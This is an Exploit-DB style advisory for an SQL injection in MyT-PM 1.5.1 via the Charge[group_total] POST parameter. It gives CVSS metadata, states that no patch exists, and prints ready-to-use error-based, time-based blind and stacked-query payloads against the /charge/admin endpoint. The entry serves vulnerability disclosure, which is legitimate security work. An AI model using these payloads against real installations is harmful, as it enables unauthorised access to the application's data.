MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection

vendor:

MyT-PM

by:

Mehmet Önder Key

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: MyT-PM

Affected Version From: 1.5.1

Affected Version To: 1.5.1

Patch Exists: NO

Related CWE: N/A

CPE: 2.3:a:myt:myt_pm:1.5.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WAMPP @Win

2019

MyT-PM 1.5.1 – ‘Charge[group_total]’ SQL Injection

An attacker can access all data following an un/authorized user login using the parameter. The payloads used are Error Based, Time-Based Blind and Stacked Queries.

Mitigation:

Input validation and sanitization should be done to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection
# Date: 03.01.2019
# Exploit Author: Mehmet Önder Key
# Vendor Homepage: https://manageyourteam.net/
# Software Link: https://sourceforge.net/projects/myt/
# Version: v1.5.1
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
MyT (Manage Your Team) - is a free open source task management and project
management system, based on Yii Framework, easy to use and with a great
perspective of growth for the future.

# Vulnerabilities:
# An attacker can access all data following an un/authorized user login
using the parameter.

# POC - SQL Injection :

# Parameter: Charge[group_total](POST)
# Request URL: /charge/admin

#    Type : Error Based
#    Payload: Charge[user_name]=k&Charge[group_total]=1) AND
EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT
(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid

#    Type : Time-Based Blind
#    Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM
(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid

#    Type : Stacked Queries
#    Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT
SLEEP(5)#&Charge_page=1&ajax=charge-grid